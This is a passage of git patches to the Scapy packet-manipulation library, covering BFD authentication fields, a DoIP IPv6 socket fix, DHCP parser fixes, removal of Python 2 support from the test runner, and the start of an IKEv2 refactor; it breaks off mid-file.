+from scapy.fields import ( + BitField, + BitEnumField, + ByteEnumField, + XNBytesField, + XByteField, + MultipleTypeField, + IntField, + FieldLenField, + FlagsField, + ByteField, + PacketField, + ConditionalField, + StrFixedLenField, +) from scapy.layers.inet import UDP -_sta_names = {0: "AdminDown", - 1: "Down", - 2: "Init", - 3: "Up", - } +_sta_names = { + 0: "AdminDown", + 1: "Down", + 2: "Init", + 3: "Up", +} + # https://www.iana.org/assignments/bfd-parameters/bfd-parameters.xhtml _diagnostics = { @@ -35,20 +52,88 @@ } +# https://www.rfc-editor.org/rfc/rfc5880 [Page 10] +_authentification_type = { + 0: "Reserved", + 1: "Simple Password", + 2: "Keyed MD5", + 3: "Meticulous Keyed MD5", + 4: "Keyed SHA1", + 5: "Meticulous Keyed SHA1", +} + + +class OptionalAuth(Packet): + name = "Optional Auth" + fields_desc = [ + ByteEnumField("auth_type", 1, _authentification_type), + FieldLenField( + "auth_len", + None, + fmt="B", + length_of="auth_key", + adjust=lambda pkt, x: x + 3 if pkt.auth_type <= 1 else x + 8, + ), + ByteField("auth_keyid", 1), + ConditionalField( + XByteField("reserved", 0), + lambda pkt: pkt.auth_type > 1, + ), + ConditionalField( + IntField("sequence_number", 0), + lambda pkt: pkt.auth_type > 1, + ), + MultipleTypeField( + [ + ( + StrFixedLenField( + "auth_key", "", length_from=lambda pkt: pkt.auth_len + ), + lambda pkt: pkt.auth_type == 0, + ), + ( + XNBytesField("auth_key", 0x5F4DCC3B5AA765D61D8327DEB882CF99, 16), + lambda pkt: pkt.auth_type == 2 or pkt.auth_type == 3, + ), + ( + XNBytesField( + "auth_key", 0x5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8, 20 + ), + lambda pkt: pkt.auth_type == 4 or pkt.auth_type == 5, + ), + ], + StrFixedLenField( + "auth_key", "password", length_from=lambda pkt: pkt.auth_len + ), + ), + ] + + class BFD(Packet): name = "BFD" fields_desc = [ BitField("version", 1, 3), BitEnumField("diag", 0, 5, _diagnostics), BitEnumField("sta", 3, 2, _sta_names), - FlagsField("flags", 0x00, 6, "MDACFP"), + FlagsField("flags", 0, 6, "MDACFP"), ByteField("detect_mult", 3), - ByteField("len", 24), + FieldLenField( + "len", + None, + fmt="B", + length_of="optional_auth", + adjust=lambda pkt, x: x + 24, + ), BitField("my_discriminator", 0x11111111, 32), BitField("your_discriminator", 0x22222222, 32), BitField("min_tx_interval", 1000000000, 32), BitField("min_rx_interval", 1000000000, 32), - BitField("echo_rx_interval", 1000000000, 32)] + BitField("echo_rx_interval", 1000000000, 32), + ConditionalField( + PacketField("optional_auth", None, OptionalAuth), + lambda pkt: pkt.flags.names[2] == "A", + ), + ] def mysummary(self): return self.sprintf( @@ -58,10 +143,12 @@ def mysummary(self): ) -for _bfd_port in [3784, # single-hop BFD - 4784, # multi-hop BFD - 6784, # BFD for LAG a.k.a micro-BFD - 7784]: # seamless BFD +for _bfd_port in [ + 3784, # single-hop BFD + 4784, # multi-hop BFD + 6784, # BFD for LAG a.k.a micro-BFD + 7784, # seamless BFD +]: bind_bottom_up(UDP, BFD, dport=_bfd_port) bind_bottom_up(UDP, BFD, sport=_bfd_port) bind_layers(UDP, BFD, dport=_bfd_port, sport=_bfd_port) diff --git a/test/contrib/bfd.uts b/test/contrib/bfd.uts index 88517005489..7de9dd30681 100644 --- a/test/contrib/bfd.uts +++ b/test/contrib/bfd.uts @@ -2,10 +2,46 @@ = BFD, basic instantiation -from scapy.contrib.bfd import BFD +from scapy.contrib.bfd import * a = UDP(sport=3784, dport=3784)/BFD() assert raw(a) == b'\x0e\xc8\x0e\xc8\x00 \x00\x00 \xc0\x03\x18\x11\x11\x11\x11"""";\x9a\xca\x00;\x9a\xca\x00;\x9a\xca\x00' = BFD - dissection assert BFD in UDP(raw(a)) + += BFD with OptionalAuth [Simple Password Auth] [dissection] +p = UDP(b'\x04\x00\x0e\xc8\x00\x29\x72\x31\x20\x44\x05\x21\x00\x00\x00\x01\x00\x00\x00\x00\x00\x0f\x42\x40\x00\x0f\x42\x40\x00\x00\x00\x00\x01\x09\x02\x73\x65\x63\x72\x65\x74\x4e\x0a\x90\x40') +assert(isinstance(p[1], BFD)) +assert(p[1].len == 33) +assert(isinstance(p[2], OptionalAuth)) +assert(p[2].auth_type == 1) +assert(p[2].auth_len == 9) + += BFD with OptionalAuth [Keyed MD5 Auth] [dissection] +p = UDP(b'\x04\x00\x0e\xc8\x00\x38\x6a\xcc\x20\x44\x05\x30\x00\x00\x00\x01\x00\x00\x00\x00\x00\x0f\x42\x40\x00\x0f\x42\x40\x00\x00\x00\x00\x02\x18\x02\x00\x00\x00\x00\x05\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x14\x15\x16\x3c\xc3\xf8\x21') +assert(isinstance(p[1], BFD)) +assert(p[1].len == 48) +assert(isinstance(p[2], OptionalAuth)) +assert(p[2].auth_type ==2) +assert(p[2].auth_len == 24) + += BFD with OptionalAuth [Meticulous Keyed SHA1 Auth] [dissection] +p = UDP(b'\x04\x00\x0e\xc8\x00\x3c\x37\x8a\x20\x44\x05\x34\x00\x00\x00\x01\x00\x00\x00\x00\x00\x0f\x42\x40\x00\x0f\x42\x40\x00\x00\x00\x00\x05\x1c\x02\x00\x00\x00\x00\x05\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\xea\x6d\x1f\x21') +assert(isinstance(p[1], BFD)) +assert(p[1].len == 52) +assert(isinstance(p[2], OptionalAuth)) +assert(p[2].auth_type ==5) +assert(p[2].auth_len == 28) + += BFD with OptionalAuth [Simple Password Auth] [Build] +p = UDP(sport=3784, dport=3784)/BFD(flags="A", optional_auth=OptionalAuth(auth_type=1)) +assert raw(p) == b'\x0e\xc8\x0e\xc8\x00+\x00\x00 \xc4\x03#\x11\x11\x11\x11"""";\x9a\xca\x00;\x9a\xca\x00;\x9a\xca\x00\x01\x0b\x01password' + += BFD with OptionalAuth [Keyed MD5 Auth] [Build] +p = UDP(sport=3784, dport=3784)/BFD(flags="A", optional_auth=OptionalAuth(auth_type=2)) +assert raw(p) == b'\x0e\xc8\x0e\xc8\x008\x00\x00 \xc4\x030\x11\x11\x11\x11"""";\x9a\xca\x00;\x9a\xca\x00;\x9a\xca\x00\x02\x18\x01\x00\x00\x00\x00\x00_M\xcc;Z\xa7e\xd6\x1d\x83\'\xde\xb8\x82\xcf\x99' + += BFD with OptionalAuth [Meticulous Keyed SHA1 Auth] [Build] +p = UDP(sport=3784, dport=3784)/BFD(flags="A", optional_auth=OptionalAuth(auth_type=5)) +assert raw(p) == b'\x0e\xc8\x0e\xc8\x00<\x00\x00 \xc4\x034\x11\x11\x11\x11"""";\x9a\xca\x00;\x9a\xca\x00;\x9a\xca\x00\x05\x1c\x01\x00\x00\x00\x00\x00[\xaaa\xe4\xc9\xb9??\x06\x82%\x0bl\xf83\x1b~\xe6\x8f\xd8' \ No newline at end of file From c54ca02ccacaee9257e9fd19741391743b543b44 Mon Sep 17 00:00:00 2001 From: sa-isd <115094878+sa-isd@users.noreply.github.com> Date: Fri, 24 Feb 2023 22:04:25 +0100 Subject: [PATCH 0976/1632] DoIp: fix socket not handling IPv6 link-local address (#3840) --- scapy/contrib/automotive/doip.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 36571cccedd..f2edcc716b8 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -279,7 +279,8 @@ def _init_socket(self, sock_family=socket.AF_INET): s = socket.socket(sock_family, socket.SOCK_STREAM) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - s.connect((self.ip, self.port)) + addrinfo = socket.getaddrinfo(self.ip, self.port, proto=socket.IPPROTO_TCP) + s.connect(addrinfo[0][-1]) StreamSocket.__init__(self, s, DoIP) def _activate_routing(self, @@ -323,6 +324,7 @@ class DoIPSocket6(DoIPSocket): Example: >>> socket = DoIPSocket6("2001:16b8:3f0e:2f00:21a:37ff:febf:edb9") + >>> socket_link_local = DoIPSocket6("fe80::30e8:80ff:fe07:6d43%eth1") >>> pkt = DoIP(payload_type=0x8001, source_address=0xe80, target_address=0x1000) / UDS() / UDS_RDBI(identifiers=[0x1000]) >>> resp = socket.sr1(pkt, timeout=1) """ # noqa: E501 From 9eb6237530fb3773e3fedaa6b24ce94efb03ba20 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 3 Mar 2023 20:58:54 +0100 Subject: [PATCH 0977/1632] Fix RawPcapReader usage with a Context Manager --- scapy/utils.py | 4 ++++ test/regression.uts | 13 +++++++++++++ 2 files changed, 17 insertions(+) diff --git a/scapy/utils.py b/scapy/utils.py index 36454985eba..ae2cf6355f0 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1256,6 +1256,10 @@ def __init__(self, filename, fdesc=None, magic=None): # type: ignore self.linktype = linktype self.snaplen = snaplen + def __enter__(self): + # type: () -> RawPcapReader + return self + def __iter__(self): # type: () -> RawPcapReader return self diff --git a/test/regression.uts b/test/regression.uts index 4bbc4315aa4..338ece79135 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2238,6 +2238,19 @@ assert len([p for p in RawPcapReader(fd)]) == 1 for (x, y) in RawPcapReader(fd): pass += Check RawPcapReader with a Context Manager +~ pcap + +filename = get_temp_file(fd=False) +wrpcap(filename, [IP()/TCP(), IP()/UDP()]) + +try: + with RawPcapReader(filename) as reader: + packet = next(reader, None) + assert True +except TypeError: + assert False + = Check RawPcapWriter ~ pcap From 9946ef17f5d3783dab966b821c559cd65135fda5 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 4 Mar 2023 21:26:49 +0300 Subject: [PATCH 0978/1632] Various DHCP fixes (#3912) * Parse zero-length DHCP options as well Until 0db2a8cfb02195e6bba777ef9794fd33e605f11f was merged zero-length DHCP options were parsed at least once and the "options" list contained tuples with at least two elements. This patch restores that. It prevents `repr(DHCP(...))` from crashing with something like ``` TypeError: ord() expected a character, but string of length 23 found ``` and also lets the fields with meaningfull empty values to be initialized properly. For example, ``` >>> DHCP(b"\x79\x00").options [('classless_static_routes',)] ``` turns into ``` [("classless_static_routes", [])] ``` It's a follow-up to 0db2a8cfb02195e6bba777ef9794fd33e605f11f * Fix the "Classless Static Route" parser FieldListField expects its fields to either fully consume bytes or throw exceptions if those bytes can't be consumed. The "Classless Static Route" field didn't do that when it received invalid subnet mask widths and it led to a loop where FieldListField tried to parse the same sequence of bytes and append the same value to the list over and over again until scapy got interrupted manually or got killed by the OOM killer. This patch addresses that by throwing exceptions when classless static routes can't be consumed. It basically relies on inet_ntoa rejecting anything other than 4 bytes. The test suite is updated to cover the corner cases. Other than that the DHCP parser was fuzzed for about an hour and nothing popped up. It's a follow-up to f5b718881441637e9f8cab75515981b32247f707 --- scapy/layers/dhcp.py | 18 ++++++++++-------- test/scapy/layers/dhcp.uts | 23 +++++++++++++++++++++++ 2 files changed, 33 insertions(+), 8 deletions(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 0db87e58be8..405545ea1b4 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -188,15 +188,7 @@ def i2m(self, pkt, x): return struct.pack('b', prefix) + dest + router def getfield(self, pkt, s): - if not s: - return None - prefix = orb(s[0]) - # if prefix is invalid value ( 0 > prefix > 32 ) then break - if prefix > 32 or prefix < 0: - warning("Invalid prefix value: %d (0x%x)", prefix, prefix) - return s, [] - route_len = 5 + (prefix + 7) // 8 return s[route_len:], self.m2i(pkt, s[:route_len]) @@ -449,6 +441,16 @@ def m2i(self, pkt, x): else: olen = orb(x[1]) lval = [f.name] + + if olen == 0: + try: + _, val = f.getfield(pkt, b'') + except Exception: + opt.append(x) + break + else: + lval.append(val) + try: left = x[2:olen + 2] while left: diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 9016486d39b..73323acf9c0 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -84,6 +84,29 @@ assert p4[DHCP].options[0] == ("mud-url", b"https://example.org") p5 = IP(s5) assert DHCP in p5 assert p5[DHCP].options[0] == ("classless_static_routes", ["192.168.123.4/32:10.0.0.1", "169.254.254.0/24:10.0.1.2"]) + +repr(DHCP(b"\x01\x00")) +assert DHCP(b"\x01\x00").options == [b"\x01\x00"] +assert DHCP(b"\x28\x00").options == [("NIS_domain", b"")] +assert DHCP(b"\x37\x00").options == [("param_req_list", [])] +assert DHCP(b"\x79\x00").options == [("classless_static_routes", [])] +assert DHCP(b"\x01\x0C\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b").options == [("subnet_mask", "0.1.2.3", "4.5.6.7", "8.9.10.11")] + +b = b"\x79\x01\xff" +p = DHCP(b) +assert p.options == [b] +p.clear_cache() +assert raw(p) == b + +b = b"\x79\x0a\x21\x01\x02\x03\x04\x05\x06\x07\x08\x09" +p = DHCP(b) +assert p.options == [b] +p.clear_cache() +assert raw(p) == b + +b = b"\x79\x09\x20\x01\x02\x03\x04\x05\x06\x07\x08\xff" +assert DHCP(b).options == [("classless_static_routes", ["1.2.3.4/32:5.6.7.8"]), "end"] + = DHCPOptions # Issue #2786 From af2d000250a8505ea7f8e160e2a376c600dfb65b Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 5 Mar 2023 00:16:38 +0100 Subject: [PATCH 0979/1632] Remove python3_only and six from UTScapy (#3888) * remove python3_only and six from UTScapy * remove python2 leftovers * apply suggestions * apply suggestions --------- Co-authored-by: Nils Weiss --- run_scapy | 12 +----- run_scapy.bat | 9 +--- scapy/tools/UTscapy.py | 64 ++++++++-------------------- test/contrib/canfdsocket_native.uts | 2 +- test/contrib/cansocket.uts | 2 +- test/contrib/cansocket_native.uts | 2 +- test/contrib/isotp_native_socket.uts | 2 +- test/fields.uts | 4 -- test/imports.uts | 2 +- test/linux.uts | 2 +- test/run_tests | 1 - test/run_tests.bat | 5 +-- test/scapy/layers/dhcp.uts | 1 - test/scapy/layers/inet.uts | 1 - test/tools/isotpscanner.uts | 2 - 15 files changed, 27 insertions(+), 84 deletions(-) diff --git a/run_scapy b/run_scapy index ce21208a155..87b6f50e91d 100755 --- a/run_scapy +++ b/run_scapy @@ -2,16 +2,6 @@ DIR=$(dirname "$0") if [ -z "$PYTHON" ] then - ARGS="" - for arg in "$@" - do - case $arg - in - -2) PYTHON=python2;; - -3) PYTHON=python3;; - *) ARGS="$ARGS $arg";; - esac - done PYTHON=${PYTHON:-python3} fi $PYTHON --version > /dev/null 2>&1 @@ -20,4 +10,4 @@ then echo "WARNING: '$PYTHON' not found, using 'python' instead." PYTHON=python fi -PYTHONPATH=$DIR exec "$PYTHON" -m scapy $ARGS +PYTHONPATH=$DIR exec "$PYTHON" -m scapy $@ diff --git a/run_scapy.bat b/run_scapy.bat index 14e71c61c28..d801bbdc0e3 100644 --- a/run_scapy.bat +++ b/run_scapy.bat @@ -6,14 +6,7 @@ set "_args=%*" IF "%PYTHON%" == "" set PYTHON=py WHERE %PYTHON% >nul 2>&1 IF %ERRORLEVEL% NEQ 0 set PYTHON= -IF "%1" == "-2" ( - if "%PYTHON%" == "py" ( - set "PYTHON=py -2" - ) else ( - set PYTHON=python - ) - set "_args=%_args:~3%" -) ELSE IF "%1" == "-3" ( +IF "%1" == "-3" ( if "%PYTHON%" == "py" ( set "PYTHON=py -3" ) else ( diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index ce891272be6..d326b4906b1 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -6,8 +6,7 @@ """ Unit testing infrastructure for Scapy """ - - +import builtins import bz2 import copy import code @@ -26,8 +25,7 @@ import warnings import zlib -from scapy.consts import WINDOWS, DARWIN -import scapy.libs.six as six +from scapy.consts import WINDOWS from scapy.config import conf from scapy.compat import base64_bytes, bytes_hex, plain_str from scapy.themes import DefaultTheme, BlackAndWhite @@ -41,8 +39,6 @@ def _utf8_support(): Check UTF-8 support for the output """ try: - if six.PY2: - return False if WINDOWS: return (sys.stdout.encoding == "utf-8") return True @@ -68,20 +64,17 @@ class Bunch: def retry_test(func): """Retries the passed function 3 times before failing""" - success = False + v = None + tb = None for _ in range(3): try: - result = func() + return func() except Exception: t, v, tb = sys.exc_info() time.sleep(1) - else: - success = True - break - if not success: - six.reraise(t, v, tb) - assert success - return result + + if v and tb: + raise v.with_traceback(tb) def scapy_path(fname): @@ -177,12 +170,12 @@ class External_Files: /i7kinChIXSAmRgA==\n""") def get_local_dict(cls): - return {x: y.name for (x, y) in six.iteritems(cls.__dict__) + return {x: y.name for (x, y) in cls.__dict__.items() if isinstance(y, File)} get_local_dict = classmethod(get_local_dict) def get_URL_dict(cls): - return {x: y.URL for (x, y) in six.iteritems(cls.__dict__) + return {x: y.URL for (x, y) in cls.__dict__.items() if isinstance(y, File)} get_URL_dict = classmethod(get_URL_dict) @@ -211,7 +204,7 @@ def __getitem__(self, item): return getattr(self, item) def add_keywords(self, kws): - if isinstance(kws, six.string_types): + if isinstance(kws, str): kws = [kws.lower()] for kwd in kws: kwd = kwd.lower() @@ -298,11 +291,6 @@ def __init__(self, name): self.expand = 1 def prepare(self, theme): - if six.PY2: - self.test = self.test.decode("utf8", "ignore") - self.output = self.output.decode("utf8", "ignore") - self.comments = self.comments.decode("utf8", "ignore") - self.result = self.result.decode("utf8", "ignore") if self.result == "passed": self.fresult = theme.success(self.result) else: @@ -461,18 +449,12 @@ def docs_campaign(test_campaign): # COMPUTE CAMPAIGN DIGESTS # -if six.PY2: - def crc32(x): - return "%08X" % (0xffffffff & zlib.crc32(x)) +def crc32(x): + return "%08X" % (0xffffffff & zlib.crc32(bytearray(x, "utf8"))) - def sha1(x): - return hashlib.sha1(x).hexdigest().upper() -else: - def crc32(x): - return "%08X" % (0xffffffff & zlib.crc32(bytearray(x, "utf8"))) - def sha1(x): - return hashlib.sha1(x.encode("utf8")).hexdigest().upper() +def sha1(x): + return hashlib.sha1(x.encode("utf8")).hexdigest().upper() def compute_campaign_digests(test_campaign): @@ -1107,11 +1089,6 @@ def main(): # Disable tests if needed - # Discard Python3 tests when using Python2 - if six.PY2: - KW_KO.append("python3_only") - if VERB > 2: - print(" " + arrow + " Python 2 mode") try: if NON_ROOT or os.getuid() != 0: # Non root # Discard root tests @@ -1128,11 +1105,6 @@ def main(): KW_KO.append("disabled") - # Process extras - if six.PY2 and DARWIN: - # On MacOS 12, Python 2.7 find_library is broken - KW_KO.append("libpcap") - if ANNOTATIONS_MODE: try: from pyannotate_runtime import collect_types @@ -1153,7 +1125,7 @@ def main(): for m in MODULES: try: mod = import_module(m) - six.moves.builtins.__dict__.update(mod.__dict__) + builtins.__dict__.update(mod.__dict__) except ImportError as e: raise getopt.GetoptError("cannot import [%s]: %s" % (m, e)) @@ -1176,7 +1148,7 @@ def main(): UNIQUE = len(TESTFILES) == 1 # Resolve tags and asterix - for prex in six.iterkeys(copy.copy(PREEXEC_DICT)): + for prex in copy.copy(PREEXEC_DICT).keys(): if "*" in prex: pycode = PREEXEC_DICT[prex] del PREEXEC_DICT[prex] @@ -1238,7 +1210,7 @@ def main(): else: with open(OUTPUTFILE, "wb") as f: f.write(glob_output.encode("utf8", "ignore") - if 'b' in f.mode or six.PY2 else glob_output) + if 'b' in f.mode else glob_output) # Print end message if VERB > 2: diff --git a/test/contrib/canfdsocket_native.uts b/test/contrib/canfdsocket_native.uts index 17889196b5c..1f0ca94d992 100644 --- a/test/contrib/canfdsocket_native.uts +++ b/test/contrib/canfdsocket_native.uts @@ -1,5 +1,5 @@ % Regression tests for nativecanfdsocket -~ python3_only not_pypy vcan_socket needs_root linux +~ not_pypy vcan_socket needs_root linux # More information at http://www.secdev.org/projects/UTscapy/ diff --git a/test/contrib/cansocket.uts b/test/contrib/cansocket.uts index 002b2021a89..52165634c9a 100644 --- a/test/contrib/cansocket.uts +++ b/test/contrib/cansocket.uts @@ -1,5 +1,5 @@ % Regression tests for compatibility between NativeCANSocket and PythonCANSocket -~ python3_only not_pypy vcan_socket needs_root linux +~ not_pypy vcan_socket needs_root linux # More information at http://www.secdev.org/projects/UTscapy/ diff --git a/test/contrib/cansocket_native.uts b/test/contrib/cansocket_native.uts index e5dae7a5ec9..22d48de1117 100644 --- a/test/contrib/cansocket_native.uts +++ b/test/contrib/cansocket_native.uts @@ -1,5 +1,5 @@ % Regression tests for nativecansocket -~ python3_only not_pypy vcan_socket needs_root linux +~ not_pypy vcan_socket needs_root linux # More information at http://www.secdev.org/projects/UTscapy/ diff --git a/test/contrib/isotp_native_socket.uts b/test/contrib/isotp_native_socket.uts index 55a815f6ccf..e41bf24ee3c 100644 --- a/test/contrib/isotp_native_socket.uts +++ b/test/contrib/isotp_native_socket.uts @@ -514,7 +514,7 @@ assert not rxThread.is_alive() assert succ + ISOTPNativeSocket MITM attack tests -~ python3_only vcan_socket needs_root linux +~ vcan_socket needs_root linux = bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package forwarding vcan1 exit_if_no_isotp_module() diff --git a/test/fields.uts b/test/fields.uts index 540877af913..882b2369ef1 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -1123,10 +1123,6 @@ assert fcb.i2repr_one(None, RandNum(0, 10)) == '' True = EnumField with Enum -~ python3_only - -# not available on Python 2... - from enum import Enum class JUICE(Enum): diff --git a/test/imports.uts b/test/imports.uts index 635c6aba7ba..5984fe57260 100644 --- a/test/imports.uts +++ b/test/imports.uts @@ -1,7 +1,7 @@ % Import tests + Import tests -~ python3_only imports +~ imports = Prepare importing all scapy files diff --git a/test/linux.uts b/test/linux.uts index 516eade1ab8..589f1897ac0 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -318,7 +318,7 @@ assert _interface_selection(None, IP(dst="192.0.2.42")/UDP()) == "scapy0" exit_status = os.system("ip link del name dev scapy0") = Test 802.Q sniffing -~ linux needs_root python3_only veth +~ linux needs_root veth from threading import Thread, Condition diff --git a/test/run_tests b/test/run_tests index 49a10e9f987..bc6b58490ac 100755 --- a/test/run_tests +++ b/test/run_tests @@ -21,7 +21,6 @@ then do case $arg in - -2) PYTHON=python2;; -3) PYTHON=python3;; *) ARGS="$ARGS $arg";; esac diff --git a/test/run_tests.bat b/test/run_tests.bat index f3812ea359d..b66ddcd7030 100644 --- a/test/run_tests.bat +++ b/test/run_tests.bat @@ -5,10 +5,7 @@ set PYTHONPATH=%MYDIR% REM Note: shift will not work with %* REM ### Get args, Handle Python version ### set "_args=%*" -IF "%1" == "-2" ( - set PYTHON=python - set "_args=%_args:~3%" -) ELSE IF "%1" == "-3" ( +IF "%1" == "-3" ( set PYTHON=python3 set "_args=%_args:~3%" ) diff --git a/test/scapy/layers/dhcp.uts b/test/scapy/layers/dhcp.uts index 73323acf9c0..a6defec10b1 100644 --- a/test/scapy/layers/dhcp.uts +++ b/test/scapy/layers/dhcp.uts @@ -116,7 +116,6 @@ assert DHCPOptions[46].name == "NetBIOS_node_type" assert DHCPRevOptions['static-routes'][0] == 33 = Check that the dhcpd alias is properly defined and documented -~ python3_only assert dhcpd import IPython diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index a8987ec3fa9..c6684d6c74d 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -362,7 +362,6 @@ options = pkt.options._fix() options = TCP random options - MD5 (#GH3777) -~ python3_only random.seed(0x2813) pkt = TCP(options=RandTCPOptions()._fix()) assert pkt.options[0][0] == "MD5" diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 39caf3981fb..a2d788ae89b 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -107,7 +107,6 @@ for out in expected_output: = Test extended scan -~ python3_only def isotp_scan(sock, # type: SuperSocket scan_range=range(0x7ff + 1), # type: Iterable[int] @@ -140,7 +139,6 @@ with patch.object(sys, "argv", testargs), patch.object(scapy.contrib.isotp, "iso = Test scan with piso flag -~ python3_only def isotp_scan(sock, # type: SuperSocket scan_range=range(0x7ff + 1), # type: Iterable[int] From 012110a960fcea8b812532f2115bb27c836246ee Mon Sep 17 00:00:00 2001 From: "Matthias St. Pierre" Date: Sun, 5 Mar 2023 15:01:13 +0100 Subject: [PATCH 0980/1632] IKEv2: refactor the implementation (#3795) * IKEv2: remove the unnecessary 'payload_' infixes The IKE messages tend to have a lot of payloads and those unnecessary eight characters per payload add a lot of redundancy and size to the output of the dissected packets. Removing them improves readability of the output and makes typing less tedious. The removal was automated using the following find+sed script: find * -type f -exec sed -i \ -e 's/IKEv2_payload_type/IKEv2_payloax_type/g' \ -e 's/IKEv2_payload_/IKEv2_/g' \ -e 's/IKEv2_payload/IKEv2_Payload/g' \ -e 's/IKEv2_payloax/IKEv2_payload/g' {} + * IKEv2: reorganize IKEv2{Attribute,Payload,Exchange}Types dicts * IKEv2AttributeTypes Swap names and numbers in the IKEv2AttributeTypes dictionary and its nested algorithm dictionaries to get rid of the awkward code to invert the entries. With this change, the transform types and algorithms can now be extracted using a simple dictionary comprehension. * IKEv2PayloadTypes and IKEv2ExchangeTypes Instead of arrays, use dictionaries like everywhere else in the module. Also change their names to make them consistent with the names of the other dictionaries. * IKEv2: bind all layers together correctly The previous bindings were incomplete: the payloads were only bound to the main IKEv2 layer, but not to the other payloads. For example, the lower binding between KE and Nonce payload is missing here: >>> IKEv2() / IKEv2_KE() / IKEv2_Nonce() >> This commit removes the manually implemented bindings and replaces them with bind_layers() calls: For every entry (np, name) in the IKEv2PayloadTypes dictionary it is now expected that there exists a corresponding 'IKEv2_' class, which is derived from IKEv2_Packet. The layers get bound as follows: bind_layers(IKEv2_Packet, IKEv2_, next_payload=np) * IKEv2: improve dissection of the CERT and CERTREQ payload * CERT payload [RFC 7296, section 3.6] Previously, the IKEv2_CERT class used a dispatch hook to define three different classes IKEv2_CERT_CRT, IKEv2_CERT_CRL, and IKEv2_CERT_STR. This commit removes the three subclasses and uses a MultipleTypeField for the `cert_data` instead. * CERTREQ payload [RFC 7296, section 3.7] The field description was apparently copied from the vendor id payload and never updated. This commit adds the correct members, however the size and count of the SPIs are not updated automatically yet. * IKEv2: replace Str*Fields with XStr*Fields All the fields contain binary data, so it makes the output much more readable to show their value as hexadecimal string. It is also more consistent with the ipsec module, see for example the spi and data fields of the ESP packet. Additionally, unify naming and formatting of lambda functions and rename the 'load' field of the Nonce, Notify and KE payloads to 'nonce', 'notify' resp. 'ke'. --- scapy/contrib/ikev2.py | 665 +++++++++++++++++++++-------------------- test/contrib/ikev2.uts | 394 ++++++++++++------------ 2 files changed, 530 insertions(+), 529 deletions(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 2c0a84ba7cc..a8c9076fb70 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -9,19 +9,38 @@ # scapy.contrib.description = Internet Key Exchange Protocol Version 2 (IKEv2), RFC 7296 # scapy.contrib.status = loads -import logging import struct # Modified from the original ISAKMP code by Yaron Sheffer , June 2010. # noqa: E501 -from scapy.packet import Packet, bind_top_down, bind_bottom_up, \ - split_bottom_up, split_layers, Raw -from scapy.fields import ByteEnumField, ByteField, ConditionalField, \ - FieldLenField, FlagsField, IP6Field, IPField, IntField, MultiEnumField, \ - MultipleTypeField, \ - PacketField, PacketLenField, PacketListField, ShortEnumField, ShortField, \ - StrFixedLenField, StrLenField, X3BytesField, XByteField, XIntField +from scapy.packet import ( + Packet, Raw, + bind_top_down, bind_bottom_up, bind_layers, split_bottom_up, split_layers +) +from scapy.fields import ( + ByteEnumField, + ByteField, + ConditionalField, + FieldLenField, + FieldListField, + FlagsField, + IP6Field, + IPField, + IntField, + MultiEnumField, + MultipleTypeField, + PacketField, + PacketLenField, + PacketListField, + ShortEnumField, + ShortField, + X3BytesField, + XByteField, + XIntField, + XStrFixedLenField, + XStrLenField, +) from scapy.layers.x509 import X509_Cert, X509_CRL from scapy.layers.inet import IP, UDP from scapy.layers.ipsec import ESP @@ -31,85 +50,121 @@ from scapy.volatile import RandString # see https://www.iana.org/assignments/ikev2-parameters for details -IKEv2AttributeTypes = {"Encryption": (1, {"DES-IV64": 1, - "DES": 2, - "3DES": 3, - "RC5": 4, - "IDEA": 5, - "CAST": 6, - "Blowfish": 7, - "3IDEA": 8, - "DES-IV32": 9, - "AES-CBC": 12, - "AES-CTR": 13, - "AES-CCM-8": 14, - "AES-CCM-12": 15, - "AES-CCM-16": 16, - "AES-GCM-8ICV": 18, - "AES-GCM-12ICV": 19, - "AES-GCM-16ICV": 20, - "Camellia-CBC": 23, - "Camellia-CTR": 24, - "Camellia-CCM-8ICV": 25, - "Camellia-CCM-12ICV": 26, - "Camellia-CCM-16ICV": 27, - "ChaCha20-Poly1305": 28, - "Kuzneychik-MGM-KTREE": 32, - "MAGMA-MGM-KTREE": 33, - }, 0), - "PRF": (2, {"PRF_HMAC_MD5": 1, - "PRF_HMAC_SHA1": 2, - "PRF_HMAC_TIGER": 3, - "PRF_AES128_XCBC": 4, - "PRF_HMAC_SHA2_256": 5, - "PRF_HMAC_SHA2_384": 6, - "PRF_HMAC_SHA2_512": 7, - "PRF_AES128_CMAC": 8, - "PRF_HMAC_STREEBOG_512": 9, - }, 0), - "Integrity": (3, {"HMAC-MD5-96": 1, - "HMAC-SHA1-96": 2, - "DES-MAC": 3, - "KPDK-MD5": 4, - "AES-XCBC-96": 5, - "HMAC-MD5-128": 